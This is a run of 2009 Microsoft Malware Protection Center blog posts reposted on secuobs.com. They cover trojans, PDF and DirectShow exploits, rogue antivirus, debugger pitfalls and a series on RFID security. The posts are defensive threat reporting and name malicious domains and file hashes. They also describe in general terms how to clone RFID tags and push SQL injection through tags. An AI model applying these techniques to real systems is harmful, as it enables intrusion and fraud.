“setupexe” This is similar to the old trick with the fakecodec, just a tad differentPlease bear in mind that the actual filename might change to somethingenticing like "movieexe", "fireworksexe", etcIMAGEIf you run this on a machine protected by Microsoft products MicrosoftForefront, Windows Live Onecare, Microsoft Security Essentials,you’ll get a pop-up saying that Trojan:Win32/WaledacgenA wasdetected and stoppedIn the words of Capt Steven Hiller Will Smith from Independence Daythe movie “Didn't I promise you fireworks ”We also advise you to stay away from any "fireworks" e-mails you mayreceive-- Andrei Saygo etet Patrik VicolIMAGEhttp://www.secuobs.com/revue/news/117461.shtmlhttp://www.secuobs.com/revue/news/117461.shtml Secuobs.com : 2009-07-03 01:35:32 - Microsoft Malware Protection Center - Hi, Ziv Mador again This week I’m attending the FIRST conference inKyoto, Japan along with four of my Microsoft colleagues: SteveAdegbite, Andrew Cushman, Jonathan Ness and Dan WolffIMAGEToday Jonathan, Steve and I gave a presentation about Microsoftresponse to the attacks which exploited a 0-day vulnerability back inthe fall of 2008 Microsoft released a security update MS08-067 thatfixed that vulnerability Given the wormable nature of thatvulnerability, we had strongly encouraged customers to install thesecurity update, for example in the following blog post In the days,weeks and months following the bulletin release, malware exploitingMS08-067 has been launched, including the widely known Conficker wormIn our presentation we described the evolution of those exploits andthe steps that Microsoft has taken to mitigate the threatsFIRST is a worldwide organization of response teams and the annualFIRST conference is an international event Nearly 400 researchersfrom 52 countries are attending the event this year It is a greatexample of collaboration and information sharing in the securityindustry Microsoft is a member and returning sponsor of FIRST Weparticipate in FIRST in order to share our experience and bestpractices and to encourage collaboration and community based defenseto meet current and future challenges Microsoft participates also inother forums For example, it participates and in the ConfickerWorking Group which helps mitigate the Conficker wormKyoto includes many different historical sites as it used to be theImperial capital of Japan for about a thousand years One of thesesites is the Nijō Castle The architects of this castle designed andcreated several defense systems There are two rings offortifications; each one of them uses a wall and a wide moat Thatobviously made an attack on the castle more difficult But anotherinteresting security feature was used there: the floors in thecorridors were built in a way that they chirp like birds when peoplestep on them That’s why they are called uguisubari or nightingalefloors This feature helped the defenders of the castle immediatelyknow when someone entered the castle, possibly with a maliciousintent It is probably one of the earliest security warning systemsever developed This castle or the Red Fort in Agra which Daviddescribed in an earlier blog post, represent some of the basic ideasin defense systems also for modern computers networks: in order tosecure them there is a need for an effective warning system, multiplesecurity defense layers, and plans for response and recoveryConficker can be used as a good example here The later variants ofthis worm, spread using multiple vectors: they exploit MS08-067 toinfect other computers on the network but also spread through shareswith weak passwords and through removable media and auto-run Thatmeans that even if an organization fully deploys all the securityupdates as soon as they are released, they still haven’t mitigated therisk of infections To minimize that risk, the organization must alsoensure that shares use strong passwords, disable auto-run or educateusers to select only the legit options, use an up to date AV,enterprise firewall, IPS systems etc That said, modern computernetworks should be protected the same way as the Nijō castle: amulti-layered defense approachKeep safe,Ziv MadorIMAGEhttp://www.secuobs.com/revue/news/116510.shtmlhttp://www.secuobs.com/revue/news/116510.shtml Secuobs.com : 2009-06-26 05:55:03 - Microsoft Malware Protection Center - On May 28, our colleagues at The Microsoft Security Response Centerreleased advisory 971778 which elaborated on a new vulnerability inMicrosoft DirectShow effecting Windows 2000, Windows XP and WindowsServer 2003 You can obtain more details on how to protect yourenvironment from this vulnerability from the Microsoft SRD blogWe have been closely monitoring the malware landscape for threatsrelated to leveraging exploits against this new vulnerability Wesubsequently developed and released a generic detection for malformedmedia files, Exploit:Win32/CVE-2009-1537, based on MAPP informationprovided to us Also, we have developed detections for the knownmalicious web pages, as Exploit:JS/MultBM or Trojan:HTML/RedirectorIOur security products, such as Windows Live OneCare, MicrosoftSecurity Essentials, and Forefront Client Security can block access tothese malformed media files with signature definition update version159798 or higherWhile we are aware of several distinct files containing theseexploits, based on our telemetry, the number of affected customers isvery low For our fellow researchers in other security companies, hereare some SHA1 hashes of malformed media files:SHA1MD52203a2e9a22f8eedb14afbf12af7ce9e70b1abd97334880a6ca750db02530fb66ba426ad9b9e829eeb5215a6d6970a37d42672f5e150484640f56aacb823a28c2b70287692c4a338bcd76e2c4c174b8bf5866cc0dbd2233db809b05d599c92d7ee4f404ebe1ccf2034bee60fThe known exploits are typical drive-by attack scenario as shown inthe following diagram:IMAGEUsers, upon visiting a specially constructed web page that invokes thevulnerable media plug-in, will encounter exploit shellcode, whichfurther execute and download additional malware to the infectedmachines Intending to bypass antimalware protection, malware binariesare encrypted in the download data streamNew dog, same old tricks To wrap up the attack scene, under the coverof the new exploits are the old long-lived online-game passwordstealers:PWS:Win32/WowstealAP drops PWS:Win32/WowstealAPdllTrojanDropper:Win32/DozmotC drops PWS:Win32/DozmotC andVirTool:WinNT/DozmotATrojanSpy:Win32/LydraAEWe recommend you revisit these security tips during your online andgaming adventures As usual, be cautious when visiting web sites andopening movie files from untrusted sources, and make sure yourantivirus software is up to date Microsoft will release a securityupdate for this issue and once that happens, install it immediately-- Lena Lin, Cristian Craioveanu, Josh Phillips et Patrick NolanIMAGEhttp://www.secuobs.com/revue/news/113919.shtmlhttp://www.secuobs.com/revue/news/113919.shtml Secuobs.com : 2009-06-24 04:14:08 - Microsoft Malware Protection Center - IMAGEMicrosoft Security Essentials is a new, no-cost, anti-malware solutionfor genuine Windows PC consumers that provides real-time protectionagainst viruses, spyware and other malicious threats It is alightweight, effective and modern anti-malware which runs on 32 bitand 64 bit Windows 7, Windows Vista and Windows XP SP2 and higher, andon modern consumer form-factors such as netbooksA beta version of Microsoft Security Essentials v10 is availabletoday for up to 75,000 consumers in a limited number of countries Youcan find more details about the beta at the Microsoft SecurityEssentials website-- Microsoft Security Essentials TeamIMAGEhttp://www.secuobs.com/revue/news/112918.shtmlhttp://www.secuobs.com/revue/news/112918.shtml Secuobs.com : 2009-06-18 00:52:25 - Microsoft Malware Protection Center - Recently, Marian and Andrei presented a paper at the CARO Workshopabout PDF vulnerabilities and exploits related to themAs we presented in our latest Security Intelligence Report, there wasan increase in the use of these exploits, and the trend keeps goingon Since the beginning of the year, we have received over fivethousand different samples taking advantage of various PDFvulnerabilities Even though updates for these vulnerabilities areavailable, some for more than a year, people remain vulnerable despitehaving the solution at hand And what is more important, the malicioussamples work and people still get infected because they have notprotected their systems as they should The chart below shows theevolution by month which shows how things keep trending up:IMAGEAn example of how an attack takes place would be like this: a websitehosts a specially crafted PDF document, which contains the exploitcode Someone visits the page and the browser opens the PDF document,executing the PDF application in order to show its content If theversion of the PDF application in the user’s system is vulnerable, theobfuscated exploit code eg a variant of Win32/Pdfjsc is executedand downloads an awful piece of malware This downloaded malware canobviously change from a password stealer to any other specimen the badguys want Some of the cases we have seen include members of familieslike Win32/Vundo, Win32/Renos, etcNowadays, most applications have the option to update automaticallyLet’s take advantage of it and have a safer computer experience Formore information on how to update your Adobe software, visit the Adobesecurity bulletin pageAndrei Saygo, Marian Radu et Enrique GonzalezIMAGEhttp://www.secuobs.com/revue/news/110960.shtmlhttp://www.secuobs.com/revue/news/110960.shtml Secuobs.com : 2009-06-16 07:23:17 - Microsoft Malware Protection Center - No-one who knows what they're talking about would say that writing adebugger is easy It's certainly made harder when the platform offersso many opportunities for things to go wrong Here are two examplesCreateToolhelp32SnapshotThis function was introduced to the Windows NT-line in Windows 2000,though it existed as far back as Windows 95 in a separate DLL OnWindows NT-based systems, it calls into the ntdllRtlQueryProcessDebugInformation function, which performs themajority of the work Depending on the information that is requested,that function might insert into the process a thread that is used togather that information about the processThis has the unintended consequence of resuming a suspended processFor example, calling CreateProcessmyfileexe, CREATE_SUSPENDED thenCreateToolhelp32Snapshotmyfileexe pid will cause myfileexe to wakeup and start runningIf a debugger has attached to the process, then Windows will createanother thread that executes a breakpoint on behalf of the debuggerThe problem is that when the process wakes up, the debug breakpointwill execute before the debugger can call WaitForDebugEvent tointercept itThis will typically cause the process to crash though there are waysto intercept this and continue to run, no longer under the control ofthe debugger One debugger is known to misbehave as a result of thisbugWindows XP and later attempt to read from the process memory firstThis attempt fails for a suspended process because it has not beencompletely initialised at that time As a result, Windows XP and laterdo not create a new thread, so they do not demonstrate the problemCREATE_PROCESS_DEBUG_EVENTWhen a process is started, a debugger typically wants to place abreakpoint at the main entrypoint There are two common ways to locatethis addressThe first way is to query the EntryPoint field in theInMemoryOrderModuleList structure Interestingly, we document thisfield as "unsupported", even though the PSAPIDLL uses itThe second way is to wait for the CREATE_PROCESS_DEBUG_EVENT event tooccur, and then to query the lpStartAddress field in theCREATE_PROCESS_DEBUG_INFO structure However, there is a problem withthis second way Windows has supported the relocation of EXE filessince Windows 2000, though this fact has never been documentedofficially With the introduction of Windows Vista and Address SpaceLayout Randomisation ASLR, this "feature" came to be supportedofficiallyAs a result, a file can be loaded to an address other than the onethat it requested One case in particular is when the requestedaddress is intentionally invalid, such as zero or above 2Gb Thiscauses Windows to load the file to 0x10000 So far, so goodThe problem is that for such files, the value in the lpStartAddressfield in the CREATE_PROCESS_DEBUG_INFO structure contains the"expected" and incorrect entrypoint value, that is calculated bysumming the values from two PE header fields: ImageBase andAddressOfEntryPointA breakpoint that a debugger places there will not be hit If thedebugger then resumes the process, the process will run freely Onedebugger is known to misbehave as a result of this bugSuch seemingly simple things, yet such potentially disasterouseffects That's why debugging malware is best left to theprofessionals If you can't trust your debugger, whom can you trust- Peter FerrieIMAGEhttp://www.secuobs.com/revue/news/110115.shtmlhttp://www.secuobs.com/revue/news/110115.shtml Secuobs.com : 2009-06-12 06:46:19 - Microsoft Malware Protection Center - So far, it seems that a number of known attacks on RFID devices can begenerally sorted into three broad categories, that is;* cloning an RFID tag,* unathorised modification of an RFID tag,* using an RFID tag to mount an attack on an RFID back endapplication,* attempting a blunt denial of serviceContinuing the biological virus analogy, an RFID tag can act as acarrier affected by a dormant infection, and the RFID protocol andradio waves can act as a transmission medium say, like a fine mist ofwater that carries an airborne biological virus In turn, an RFIDreader is the port of entry for the infection and a computer connectedto an affected RFID reader is thus susceptible to system infectionIf the traffic between the RFID reader and the tag is not encrypted itappears that cloning a tag, in most cases, is a fairly straightforward procedure An analogy can be made to a voice-activatedsecurity system where recording the genuine request - responseexchange would generally allow imitating the response any time therequest for such response is made In the case of an RFID system, adevice constructively similar to an RFID reader but more sensitive,with multiband capabilities and the ability to record and analyzerecorded sessions, is placed close to an RFID tag during the exchangeThe radio session is recorded, demodulated and stored for postprocessing Once the response of an RFID tag is isolated, it can beplayed back to the reader, eventually retransmitting an exact copy ofthe response from a legitimate tag The cloning is complete Similarlyinterrogating a tag with a predominantly known original reader requestrecorded earlier could activate a tag and allow recording of thetransmitted tag’s response away from the original reader This allowscloning to occur simply by placing the session recording device in theoperating proximity of the tagWould such a recording device be readily available to the generalpublic The answer is yes The architecture of an RFID recorder wouldbe generally based on a Software Defined Radio SDR This type ofradio device was originally proposed for use by the military in late80’s and early 90’s and then made its way to the public sector for usein cell phone, medical and measuring equipment The SDR samples the RFsignal directly into the digital domain allowing any post processing,including demodulation, decoding, and any signal transformations to bedone by software This configuration is extremely flexible and allowsthe use of different protocols, encoding, decoding and modulationschemes This is possible because all the necessary processing is donein the supporting software, leaving hardware modules intactThe advances in Very Large Scale Integrated VLSI chipsets and highfrequency electronics have made SDR solutions affordable A number ofdesigns have been created and made available for reproduction byanyone who is generally versed in electronics One such device hasbeen designed specifically for RFID security studies by JonathanWesthues http://cqcx/proxmark3pl and is referred to by numerousRFID hacking communities Another SDR implementation, which is notspecifically tailored for RFID needs, but is extremely flexible sinceit has capabilities to cover beyond HF band of 13 MHz possiblyincluding 433Mhz, 865-956 MHz, and 245 GHz bands, is thecollaborative work of several individuals and is currently beingactively developed and supported http://hpsdrorg/Is it possible to modify an RFID tag with some arbitrary informationYes it is Acting as an RFID reader and following a defined protocol,an SDR device can relatively easily modify information stored on atag It is also possible that an SDR device acting as a tag couldsimply present desired information to an RFID reader This last methodeven works for tags which cannot be written to - the tag is simulatedby an SDR device and the actual tag is not even needed Severalsuccessful proofs of concept have already been reportedSome RFID system configurations can loosely be looked at as user-inputweb-based processing systems An RFID reader could be compared to aweb page which requires some user input, and the tag can be related toactual information provided by a user Such a system may besusceptible to vulnerabilities targeting various layers of back endsoftware For instance, an application responsible for acquiring auser’s input or processing it, or the database engine or the decisionmaking application layer could be susceptible Most notoriously itseems that some database engine vulnerabilities found to affect webbased input systems could be directly applied and exploited, thusaffecting an RFID system as well It looks like most of the time theback end is similar, if not exactly the same, for both of these systemconfigurationsThere’s the possibility of crafting an attack where an exploit wouldallow the execution of malicious code stored on a tag This could leadto an attacker gaining control of the back end infrastructure andpossibly lead to the retrieval, loss or modification of sensitiveinformation and costly down time It is also possible to have such anattack propagate itself either through previously unaffected tags orby any other conventional means such as mass mailing, shared drivesor any other removable media Some basic proof of concepts havealready been circulated through the web, and while they are still intheir infancy and only work in a controlled lab environment, thedevelopment of such techniques might pose a real treat in the futureBecause of physical restrictions on the number of tags which can beplaced in the proximity of an RFID reader, generally, most RFIDsystems are not robust enough to defend against input informationoverloads Although certain algorithms exists which are used toprocess multiple tags placed in the proximity of the reader, such aswalking a tree of tags id’s or a randomized poll for a bounced tagrequest, there is still a number of ways to disrupt an RFID servicethrough RF interference Creating interference on the carrierfrequency of a reader will generally disrupt a radio frequencycommunication affecting the quality of the modulated signal Such aneffect can be observed on a conventional radio when trying to tune toa weaker station which happens to share a carrier frequency with amore powerful station Also because of automatic gain control of radioreceivers aimed at protecting their input circuits from signaloverloads, the sensitivity of the receiver will be tuned down toaccommodate the stronger signal thus masking the weaker signal outIn the case of encrypted RFID tags most of the attacks are not astrivial and require cryptanalysis in order to retrieve the key and thesession’s data To make it somewhat viable could require substantialcomputer power Because of the cost restrictions associated with tags,which affects their computational abilities, the key length is keptlow, usually in the vicinity of 40 bits, and the encryption algorithmis generally kept obscure in the hopes of thwarting cryptanalysis Butusing obscure encryption algorithms unfortunately most of the timeworks to the advantage of an attacker Unknown or specificallytailored encryption algorithms are unlikely to have been tested by thebroader cryptanalyst community Often, when these algorithms are laterexposed, they are discovered to be weak or may contain flaws which canbe exploitedIt appears that in most of these case scenarios the security aspect ofRFID designs is still a tradeoff between the cost of implementation orreplacement, and the probability of attacks carried out on anyparticular RFID solution A practice which may be acceptable todaymight become very costly in terms of down time and data loss once RFIDsolutions become widely adopted by industries and economicallylucrative to attackersThere are certain steps which might be taken to fortify RFID security* Keep RFID tags RF shielded or disabled until actual use with thereader, essentially limiting exposure of the tag to thepossibility of cloning or a cipher attack* Use proven encryption algorithms - It is viable in the long run,despite the cost, to have all access control tags encrypted usingproven encryption algorithms with larger keys DES, RSA and soforth While it might keep you at a door for a bit longer duringan authentication process it is definitely worth it, consideringthe potential toll of a security breach* Use a testing platform utilizing the SDR devices mentioned aboveto assess different configurations and possible security issuesassociated with an RFID solution - why wait until someone elseuncovers and possibly uses a vulnerability in your design* Provide robust input validation This is the first and veryimportant line of defense against vulnerabilities* If security is paramount, combine RFID solutions with other meansof access control, for instance biometric* Have an RF SDR scanner listening in on a tag reader exchange andvalidating the data and protocol according to its internaldatabase Having a database of known attacks against such aconfiguration can act as an RFID intrusion detection system, andpossibly block off malicious tagsWhile the technology may be relatively novel, its adoption by variousindustries should be considered with security in mind--Oleg PetrovskyIMAGEhttp://www.secuobs.com/revue/news/108917.shtmlhttp://www.secuobs.com/revue/news/108917.shtml Secuobs.com : 2009-06-09 21:17:58 - Microsoft Malware Protection Center - This month, MSRT takes on another prevalent rogue family This one iscalled Win32/InternetAntivirus and, although it has dabbled with thenames General Antivirus and Personal Antivirus*, it is usually easy torecognise by the moniker Internet Antivirus ProWin32/InternetAntivirus screenshotWin32/InternetAntivirus follows the familiar path of fake onlinescanner leading to the rogue downloader, which in turn installs therogue itself The online scanner looks like this:Win32/InternetAntivirus fake online scannerThis rogue downloader that these pages want you to run also downloadsa password stealer called TrojanSpy:Win32/Chadem Win32/Chadem triesto grab FTP usernames and passwords that the rogue creators can thenuse to compromise servers in order to host more malware They use newdomain names every day, often registering multiple names at a time,like scanfan4info, star4scaninfo and scanstar4infoWin32/InternetAntivirus also installs a component to display messagesin your browser, similar to the combination of Win32/FakeXPA andWin32/Yektel And it displays a bogus Windows Security Center, whichreports that Internet Antivirus Pro is "unable" sicWin32/InternetAntivirus fake Security CenterThis is all pretty normal rogue behaviour these days As always, onlyuse security software that has been tested by a trusted third partyRead this or the latest Security Intelligence Report SIR for moredetails on what to look out for-- Hamish O'Dea* Not to be confused with Win32/FakeXPA, which also currentlymisuses the name Personal AntivirusIMAGEhttp://www.secuobs.com/revue/news/107611.shtmlhttp://www.secuobs.com/revue/news/107611.shtml Secuobs.com : 2009-06-06 03:03:25 - Microsoft Malware Protection Center - An RFID system is based around a reader and a tag A tag storesinformation, whereas an RFID reader retrieves or modifies informationstored on the tag To transmit this information through the air, bothdevices use high frequency electric current oscillations thefrequency of such current oscillations is also known as radiofrequency or RF which when applied to a piece of wire referred to asan antenna have a tendency to extend themselves well beyond theactual antenna wire boundary in the form of electromagnetic wavesSuch waves consist of two parts; magnetic and electric Each of thesecontributing parts has an area of influence which depends on thedistance from the emitting antenna Another important feature of thewaves is their ability to induce electric charge or current in aconductor placed in the path of such wave propagation If a tag isplaced in the path of an electromagnetic wave emitted by a reader,there will most certainly be electric current induced in the tag’santenna Also, the direction of propagation can be roughly controlledby the shape of the emitting antenna, although in reality waves tendto scatter among a multitude of directionsHere’s an oversimplified but basically functional schema of an RFIDsystem Fig1IMAGEFig 1To pass information from the reader to the tag and back, the RF wavesare controlled, or as it is custom to say, modulated, with a muchlower frequency of actual data transmission A variety of modulationschemes exist, but most commonly they are based on the control ofelectromagnetic waves properties; amplitude, frequency and phase Themodulation schemes employed in RFID are designed to be the most usefulin digital transmissions, meaning that such modulations encode onlytwo states, interpreted as ‘0’ and ‘1’ These modulation schemes arecalled ASK amplitude shift keying, FSK frequency shift keying andPSK phase shift keying A simplified overview can be seen in thefollowing examplesImagine we need to encode 101010 this number is chosen as a goodillustration of modulation for the purposes of our exampleIMAGEAs can be seen from fig2 a ‘1’ or a ‘0’ state are represented byintermittently changing one of the wave’s properties; the amplitude,frequency or phase It is worth noting that the frequency of theelectromagnetic wave, which is subjected to modulation, is normallycalled a base frequencyModulation and demodulation of the carrier frequency normally adds tothe computational load for a reader or a tag Also with the advent ofspecialized hardware bases for RFIDs there’s also a tendency to shiftRF functions away from the main processing unit within a tag or areader and incorporate them as functionally complete modules within aspecialized integrated circuit Such higher circuit integrationessentially frees CPU to conduct more computationally intensiveencryption algorithms To distinguish between varieties of RFIDdevices and to make sure they best suit their dedicated purposes thereare a number of standard protocols defined for an RFID tag and areader exchange These protocols differ by occupied bandwidth, carrierfrequency, proximity of operation, amount and type of data exchangedand the type of coupling between the reader’s and the tag’s antennasSo far there are a number of carrier frequencies which are used forRFID protocols The frequencies in the range of 125-135 KHz are oftenused for pet and human tag implants as well as for some securityaccess systems, such as car immobilizers and secured perimeters Therange of a reader - tag interrogation is mostly limited to 05 metersaround 16 feet The bit rate of communication is comparatively slowless than 1kbps and the bit traffic is normally not encrypted Inmost cases tags are passive, meaning that they feed off a magneticfield created by the reader These passive tags are often quite simplein implementation and tend to use backscatter propagation, basicallyreflecting the signal emitted by the reader in a certain way based ona configuration of the tag’s reflective surface Once received, areader analyzes the signal’s waveform to make a decision about thevalidity of the tag Such technology is not new; quite similartechniques are used in radar or sonar applications to identify basictarget's shapes for instanceThere are also some carrier frequencies allocated around 1356 MHz,433 MHz, 865-956 MHz, 245 GHz The carrier frequency, generally,affects the proximity of operation as well as the amount ofinformation it can carry when modulated, hence the used bandwidth andthe speed of data exchange Of interest, 1356 MHz is becomingincreasingly popular Because this frequency is fairly low, it allowsinexpensive RF designs for a reader and a tag, and at the same timeprovides an increased bandwidth for communication when compared tolower base frequencies such as 125-135 KHzPeering inside a modern reader or a tag we can usually spot a numberof basic blocksIMAGEData from a control application, formalized by the CPU CentralProcessing Unit according to an RFID protocol, is passed to a DSPDigital Signal Processor where it is functionally transformedfollowing the modulation and encoding schema The byte stream thenfollows to a DAC Digital to Analogue Converter The DAC convertsdigital information to its analogue representation where for instancedigits correspond to an analogue parameter, say voltage and passes itto an RF amplifier The commutator controls the signal flow in and outof the antennaThe received signal follows the reverse path where it is digitized bythe ADC analogue to digital converter and then demodulated anddecoded by the DSP Note that the schematic of the module shown inFig3 is greatly simplified, but even at its most basic it shows amodern approach to design and implementation of RFID transceivermodules which heavily rely on digital post processing - while it issomewhat more expensive for design and manufacture, it is extremelyflexible This architecture can adapt to changes in modulationencoding and RFID protocol by utilizing different software orfirmware It avoids costly hardware redesigns and remanufacturing andleads to greater encapsulation of RFID protocols from the controllingapplicationWhile it is desirable to follow the digital signal processing approachwhen designing RFID infrastructure, in the case of RFID tags it is notalways possible or viable For successful adoption of RFID technologyit is imperative that the price of RFID tags stay low This factorlimits computational power available to a microcontroller for the DSPimplementation Most of the time DSP is sacrificed in favor ofhardwired analogue logic which cannot be changed to reflect adoptionsof newer standardsThe basic blocks of a tag include a CPU, memory, RF transceiver,modulator MOD, demodulator DEM and antennaIMAGEThere are many variations in RFID tag implementations For instance,there are tags which use only the geometric properties of theirpiezoelectric surfaces to resonate in response to the signaltransmitted by the RFID reader The geometric configuration of theresonating RFID tag membrane imprints a distinct signature on thereflected RF signal While the cost of such tags is extremelyattractive, the use is very limited and overall such a solution mightnot be as cost effective and as generally adopted as the rewritabletag pictured in Fig4There’s no doubt that RFID solutions are convenient, viable andprovide flexibility to access control, payments and trackinginfrastructures There are a number of pilot programs run by some bigretail chains where RFID tags replace UPC barcodes There are tollpayment systems in the US and elsewhere that have been utilizing RFIDtags for some time In recent years we’ve seen the introduction ofRFID passports by some European and Asian countries There also seemsto be a wide application of RFID tags implanted in pets, helping totrack a stray pet and return it to its ownerThe adoption of RFID tag technologies by industries is on the riseAccording to IDTechEX, it is expected that the RFID market will growfrom 5 billion measured in 2008 to an estimated 25 billion in 2018Where does it leave us in terms of the RFID security Should we bemore concerned and more prepared with all the facts currently at handYou’ll have to read part 3 of this series on RFID security--Oleg PetrovskyIMAGEhttp://www.secuobs.com/revue/news/106448.shtmlhttp://www.secuobs.com/revue/news/106448.shtml Secuobs.com : 2009-05-29 02:14:51 - Microsoft Malware Protection Center - Most people would be aware that biological viruses can be airborne,and can spread in this manner For instance a common flu virus is ableto survive in a fine mist of water droplets suspended in mid air untilit lands on the next host Luckily, not all viruses are created thesame - some can't "fly", some "fly" but can't "land", some land butcan't reattach themselves to a hostInterestingly enough the same analogy persists in the realm ofcomputer viruses Would my computer or a smart device get infected ifI came close to an infected laptop or a PDA Continuing the analogyfrom the biological world, it depends on the ability of analready-infected system to deploy viruses into the common medium fortransmission air in our case, the host’s defences against such anattack, and the ability of the virus to penetrate those defencesTechnically speaking, if a virus broadcasts itself utilising awireless data transfer protocol and another system accepts thistransmission and transfers control to the received data, then we mayhave a case of an "airborne" infectionThe most plausible case scenario might include a virus that utilises avulnerability in the driver of a wireless device or a service usingeither TCP/IP or Bluetooth protocols However, despite the growingnumbers of wireless devices, including smart phones, PDAs and 2G,25G, 3G and GPRM network services, so far we've been fortunate to nothave outbreaks of this nature Perhaps this 'good fortune' can beascribed to several factors, including the diversity of wirelessplatforms, drivers, and services which limit the possibility ofreplication as well as the prevalence of security measures aimed atplugging holes exposed by vulnerabilitiesThe situation is a bit different with common Radio-FrequencyIdentification RFID devices We use them every day - some of uswithout even realizing it For instance books or DVDs in somelibraries have RFID tags that are scanned when they go in and out of alibrary database We are granted access to offices and restrictedpremises using RFID badges Some supermarkets and warehouses have runpilot programs to track and scan goods using RFID tags Many countrieshave started using RFID for admittance to public transport, toll roadsand passport control Since 1998 ExxonMobil has been using RFID forfast transactions at the pump The use and demand of RFID technologiesis increasingAt a basic level we have two devices: an RFID tag and an RFID scannerWhen an RFID tag comes within close proximity of the RFID scanner thescanner reads and processes information from the tag A tag can beactive or passive - that mostly means either the presence or absenceof an internal power source If there's no internal power source,RFIDs use a wire coil which picks up electromagnetic energy from areader The tag can be read or written to The tag could storeidentification information, as well as arbitrary information acting asa portable storage device used by a service application in any way itfinds useful For instance, a tracking system can update a tag on apackage when it passes certain check pointsAt a hardware level an RFID tag normally consists of a receiver, atransmitter, and a micro-controller which facilitates the exchangeThe RFID sensor or a reader/writer is pretty much the same exceptperhaps the transceiver is a bit more powerful and themicro-controller usually has more processing power than an RFID tagNormally, information stored on the tag has to be authenticated toprevent counterfeiting but because tags are thought of most often as adisposable device with the cost of manufacturing kept low, generallyRFID tag micro-controllers are not powerful enough to employsophisticated means of a robust real time encryption and aresusceptible to attacksMost of the time an RFID reader is connected to some sort of databasesoftware to process data received from the tag Once the tag iscompromised it further opens possibilites for various scenarios ofsecurity breaches For instance using an SQL injection vulnerabilitytechnique one may be able to force the system to run a storedprocedure or a malicious binary code inside a database engine, whichin turn can write code back to each passing tag, hence aiding in thepropagation of the attack In a succession of several blogs I'd liketo explore the features and various standards of RFID devices andtheir security - perhaps going under the hood of most common hardwareand software configurations--Oleg PetrovskyIMAGEhttp://www.secuobs.com/revue/news/102847.shtmlhttp://www.secuobs.com/revue/news/102847.shtml Secuobs.com : 2009-05-28 00:07:18 - Microsoft Malware Protection Center - We’re seeing plenty of reports for a JavaScript redirector malwarefamily that we call Gamburl; previous reports have called it Gumblaror RedirThese attacks seem to be coming from legitimate Web sites with pagesthat have been modified to contain this malicious script So even ifyou’re visiting a Web site that you trust, there’s still thepossibility that you may be a victim of these so-called “drive-byattacks”When a user visits a site containing a Gamburl script, the browserwill be redirected to a specific Web site that contains a slew ofexploits and other malware As of this writing, Gamburl is known toredirect to the following Web sites:gumblarcnmartuz cnOnce connected to the above sites, Gamburl tries to download othermalware into the system From what we have observed, these malware aremostly backdoors, PDF and Shockwave exploits However, some of theobserved downloaded malware are variants of the Win32/Daonol familyExamples of MD5 of Daonol seen are 7de29e5e10adc5d90296785c89aeabceand 2131112053ed144c46277b9024bcf39f Daonol trojans are capable ofpreventing access to security Web sites, and redirecting searches tosites hosting other malware Daonol is also capable of stealinginformation, such as FTP credentials, and placing the information in afile in the Windows system folder called sqlsodbcchm Note that afile named sqlsodbcchm exists by default when you install Windows,and so is overwritten if your system has been infected by Daonol Thismay be a symptom of Gamburl/Daonol infection In case you suspectinfection, you might want to check the list of some the unique hashesand file size of a clean sqlsodbcchmHashFileSize Bytes005AAD8912A62127A2F416AA9FD089000D24851A9789203C9CD0D8E90DD8754F8488A085359C818A28A90970530DB4AB7E18991BF64139E7078249679098C85F2C9775817257DF49E03DAF2BA1FA286FBE2C14802ACCD2A971761B10F5F97E2B7159C872B3576D72B4CF2AD2FFB549771236F25115C31DBFEB11D9BF12B620266F46BA041966472667D90C7B0CBCC212B8C9143C28C7AD5105BE49977462803AD07C1C7A8908BBDB5F7AB32A19C9A724ECC981242915AA45C3FAF60137402270F0C915C0F5CA2CD1969452C73542A1598AEA03F7927ECF8F7156106037D67969752D570F7E8CD9DFED179996AC40F7F7EF7AC99E93957652EA3BAFD66A74ADC6B835F31BD4E4A228F666A5D95739309FF9840F53DFF406EC580063A9975224F626DE9701530AE3FF04C8D486A5BE77ACB0939B06AF626F17D48693328BB23CEF7816035E32B3BF28A9F9606B9FF2559685134F96E4305B6E28B966F15E9845748E44AF357629739338A8E15E68D64670016E62D6D2150F812CD312989725044A4B285C1B27FEB36E0E0C3D0081A63241AE6AF97369487AA6CDB994E1855B33C1F3B0BE522C36540E5697216540F94FA630BB64529F656C6EAA4F48A3F87756D987005690D97E9F9E913431AA9453D0185F2665A713CC97035583C919DF623E4B8A7B3EFAD6D2E1C792B823D5D9810058BC35673C8B1F751CD0584A6914740B2F3DCAAE967055A658A36EF43147CB3F1DBC4276EA82A239BF8FA493455FBA738B9698AA61645CFFE3AD95192C4BACDC499726061CBFAB7CB5AB27EED9193F225B77E2EF6BA73214964862ABAB09DFD971A90C2030BE44778206991CE2D6972686441922698A8CD80A2FC0AE15EFDAF0A0208F50B96941694BDB08101AD5C18BB5B3425EE01073320B8D8E976676BE7E7A20D2AB835C78EB8F3759C304888B86BD4973046DB4B4F065610CAE100FBDB850AFC9F16C76AB65987536EAEBB4ADCB8B240571D447A1EE9B665F6C181D296827752211F65B693C721E27785FCC6C74E9B71997E9969037E98241E1B21361CC02DC88EB57C9BB9CF1F42394909282B79C07941775B6072D97D5D033E45E8D3C6FDF9846987230AD4C2646376B819DDA4963DD2C49BC50D7A461338FD4C3533D648A14C8183D6F3A3AFEF3D1CC75CE9764091BD59E2BB7B9ED95B1DF85B314EA8FF0B3B86FD980749625698340941EB6D519A219396296E45FDCF7DB3625397586996280F2A61AE5193DB827C44300BF27FCD966759811B4A14E3196AAC93DF7CE2F50C84030AA7D13972329BA779EE746DCC5A44B30BDA6436E07997236E52971469E1E2EDDA59BDE29226CAD2D5BDA5A954BFCA5DC947929F7658F361D9F1398DD90707EDE01F003299194648475A09564B76C13C8470A44509A17B4B6023295A36198770A310EF2F35A8670F6C4B7872073F94764C23FA0848095A3E367F7F30A9BF9064DEFBF94C36F4EB7CA4C0A95800ABB417B6F06F8C18F92DCD62D9BC9F2284F468E997740B194BB244FF0FD101DCDA79CD8FFC8D33C392D1394808C6CD44574CC0F5BAC24DE85B0933A132B3A0D68450004C97875A6819A3F675ABE42C8BB870E191102C94C98724C98D1FF5D9E1D8366CF130899BC210EBE54E77F898955CA58E7CA1EE50FB8EB7428064DFE84381EEDB45395771CD3B8E1C9C1096C635AA7B37D545C9B0CA241F70101112CF2DA46516BE3FC6312C2F05DF33C6A05F8562D748343D6ED920D3D0ACEB52930A753256A21D43AE1899E97087D7E22080BF67CA6AE29BB12A51E865C22DDA48F7101136DA27CBA986161938C5086BB5C94FBBAB523B1F3797791DF025689B1E2E3C813969828AF26573BA4E2F23A98800E42C0D9D4669D41F8AB45F31F12B405489F39AFD95808E5EDDC4EF26EED5A64E4B4C509F01E224238D3C648401E634C